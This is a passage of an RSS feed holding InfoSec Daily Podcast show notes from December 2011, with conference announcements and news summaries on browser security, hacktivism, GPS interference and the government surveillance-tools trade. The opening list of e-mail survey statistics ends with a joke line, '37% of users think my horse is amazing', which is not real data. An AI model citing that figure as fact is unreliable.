<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">34% keep e-mails because they are concerned they won&rsquo;t be able to retrieve them later;</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">18% spend half an hour a day searching IT systems for information.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">37% of users think my horse is amazing</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-545-most-secure-browser-a-few-chinese-winphones-industrial-espionage-nitro-addicted-workers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3269/0/infosec-daily-podcast-episode-545.mp3" length="19732608" type="audio/mpeg" />
		<itunes:duration>0:40:38</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 545 for December 13, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Themson Mester.
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Br[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 545 for December 13, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Themson Mester.
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.accuvant.com/blog/2011/12/05/which-web-browser-is-most-secured
	Accuvant LABS has just released some new research that compares the security of three of the most widely used web browsers &#8211; Mozilla Firefox, Google Chrome, and Microsoft Internet Explorer. Google commissioned Accuvant to perform this comprehensive and independently designed security analysis to help advance the discussion of best practices in the security community. &#160;Our research findings are extremely thorough and complete, so we decided to create this blog to summarize the results.
	Malware, spyware and viruses are all too familiar to those who regularly surf the web. These malicious programs can lead to system pop-ups, slowdowns, account takeovers, credit card theft, identity theft, and the theft of personally identifiable information. While antivirus and anti-malware can help prevent an infection, the first line of defense is using a secure web browser. For a person that surfs the internet, comparing and contrasting the security of different web browsers is difficult. Marketing materials are available to the average user, but they often contain direct contradictions and the reader ends up wondering which web browser is the most secure. Our research aims to fix that problem. 
	We compared browsers from a layered perspective, taking into account security architecture and anti-exploitation techniques. &#160;&#160;Like antivirus or anti-malware software, each provides an additional layer of defense. The nice thing is, when anti-exploitation technology prevents an attack, anti-malware and antivirus aren&#39;t needed. The idea is that it&#8217;s a lot easier to keep a fortress with a moat safe than it is to protect a beach shack.
	&#8230;
	Accuvant LABS has deemed Google Chrome to be the most secured against attack.
	Associated Research Paper: http://www.accuvant.com/capability/accuvant-labs/security-research/browser-security-comparison-quantitative-approach

	Source: http://www.itworldcanada.com/news/internet-identitys-top-security-trends-of-2011/144470
	Onl[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 544 &#8211; Biggest Threat, GPS DoS, Government Malware Emporium, 3rd Party Faux Pas, Top 10 &amp; Most Secure Browser</title>
		<link>http://www.isdpodcast.com/episode-544-biggest-threat-gps-dos-government-malware-emporium-3rd-party-faux-pas-top-10-most-secure-browser</link>
		<comments>http://www.isdpodcast.com/episode-544-biggest-threat-gps-dos-government-malware-emporium-3rd-party-faux-pas-top-10-most-secure-browser#comments</comments>
		<pubDate>Tue, 13 Dec 2011 02:03:07 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3263</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 544 for December 12, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 544 for December 12, 2011. &nbsp;&nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SOLD OUT!!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.theinquirer.net/inquirer/news/2128938/hacktivsim-risen-expectations"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theinquirer.net/inquirer/news/2128938/hacktivsim-risen-expectations</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NO ONE could have foreseen the rise of hacktivism in the last year, and groups like Anonymous pose a growing threat to end users, according to chief security researcher at F-Secure Mikko Hypponen.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hypponen said that there are three groups that present internet security threats &#8211; criminals, hacktivists and governments.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When asked by the INQUIRER which was the biggest threat to the individual, Hypponen said, &quot;For the average end user, nation state attacks won&#39;t affect them at all. They have nothing to steal from you.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He added, &quot;Criminals are a big threat but hacktivists are growing. A year ago it was isolated attacks on things like the Scientology religion but [hacktivists] started to make headlines with Wikileaks, when Anonymous came out to defend the whistle blowing site.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hypponen said that typical hacktivist attacks such as leaking a web site&#39;s database including passwords &quot;will affect the end user&quot;, especially if the end user re-uses their passwords.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He added, &quot;This is a problem we didn&#39;t see happening. We weren&#39;t expecting Anonymous to be as big. Anonymous isn&#39;t going away. It is largely fuelled by this next generation that grew up with the net. The internet is as natural to them as breathing air.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hypponen thinks that eventually Anonymous will end up splitting into groups, which is how the offshoot Lulzsec was formed. He said, &quot;The only thing that connects these operations [is that] Anonymous is a brand &#8211; it&#39;s an open brand and anyone can take it.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.businessweek.com/news/2011-12-09/falcone-s-lightsquared-said-to-disrupt-75-of-gps-in-tests.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.businessweek.com/news/2011-12-09/falcone-s-lightsquared-said-to-disrupt-75-of-gps-in-tests.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Philip Falcone&rsquo;s proposed LightSquared Inc. wireless service caused interference to 75 percent of global-positioning system receivers examined in a U.S. government test, according to a draft summary of results.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The results from testing conducted Oct. 31 to Nov. 4 show that &ldquo;millions of fielded GPS units are not compatible&rdquo; with the planned nationwide wholesale service, according to the draft seen by Bloomberg News.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;LightSquared signals caused harmful interference to majority of GPS receivers tested,&rdquo; according to the draft prepared for a meeting next week of U.S. officials reviewing the LightSquared proposal. &ldquo;No additional testing is required to confirm harmful interference exists.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LightSquared, backed by $3 billion from Falcone&rsquo;s Harbinger Capital Partners hedge fund, faces challenges from makers of global-positioning system devices who say the service will disrupt navigation by cars, boats, tractors and planes. U.S. regulators are withholding approval as they check on claims of interference.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Reston, Virginia-based company has proposed offering high-speed mobile Internet service to as many as 260 million people using 40,000 base stations. The service would operate on airwaves formerly reserved mainly for satellites, and near those used by GPS devices.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LightSquared is proposing to operate at a lower power than the level used during the tests, and believes that its operations would affect about 10% of devices, Martin Harriman, executive vice president, said in an interview.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The tests worked off an &ldquo;extraordinarily conservative&rdquo; threshold and didn&rsquo;t show the devices&rsquo; performance was affected, Harriman said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;If we&rsquo;re affecting the performance of the device &#8212; my goodness, we&rsquo;d like to be sure that doesn&rsquo;t happen,&rdquo; Harriman said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The laboratory testing was performed for the National Space-Based Positioning, Navigation, and Timing (PNT) Systems Engineering Forum, an executive branch body that helps advise policy makers on issues around GPS. It found that 69 of 92, or 75 percent, of receivers tested &ldquo;experienced harmful interference&rdquo; at the equivalent of 100 meters (109 yards) from a LightSquared base station.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The devices tested include those used for automobile and boat navigation. The forum is to present its results on Dec. 14 in Washington.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The testing was requested by the National Telecommunications &amp; Information Administration, a Commerce Department agency that oversees airwaves use. The agency is still reviewing data, Moira Vahey, a spokeswoman, said in an interview today.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The government is to test high-precision receivers, used in farm equipment and scientific instruments, next year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Agencies participating in the testing included the Department of Defense and the Federal Aviation Administration, according to the draft summary. Companies participating included GPS makers Trimble Navigation Ltd. and Garmin Ltd., farm-gear maker Deere &amp; Co., and General Motor Co.&rsquo;s OnStar unit, according to the summary.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LightSquared is &ldquo;outraged by the illegal leak of incomplete government data,&rdquo; Harriman said in an e-mailed statement. &ldquo;This breach attempts to draw an inaccurate conclusion to negatively influence the future of LightSquared and narrowly serve the business interests of the GPS industry.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.f-secure.com/weblog/archives/00002279.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.f-secure.com/weblog/archives/00002279.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trojans, backdoors, keyloggers and eavesdropping is used by online criminals. The same techniques are also used by governments. Some government do this to spy on their own people or to find dissidents. Other governments do this while investigating criminal suspects.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Most of the technology used in such intrusions are not developed by the governments themselves. They are made by private companies which are specializing in providing exploits, infection proxies and backdoors to governments.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where do governments buy this stuff from? Well, there&#39;s a conference and a trade fair on this very topic. It&#39;s called ISS World and it runs five times a year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, you can&#39;t simply walk into these events, as they are &quot;by invitation only&quot;, and available only to &quot;Telecommunication service providers, government employees and Law Enforcement Officers&quot;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nevertheless, we couldn&#39;t resist taking a peek when ISS World was in Kuala Lumpur this week.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blogs.cio.com/security/16691/top-10-list-top-10-internet-security-prediction-lists"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.cio.com/security/16691/top-10-list-top-10-internet-security-prediction-lists</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here it is, so you don&#39;t have to enter the search term yourself: Top 10 list of all the internet security prediction lists (as ranked by Google) and &#8212; for no extra charge &#8212; their #1 prediction:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.sans.edu/research/security-laboratory/article/security-predict2011"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">SANS Technology Institute</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security Grows Up</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.sans.edu/research/security-laboratory/article/northcuttpredict2012"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stephen Northcutt of SANS</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">TEOTWAWKI (The End Of The World As We Know IT)</span><br />
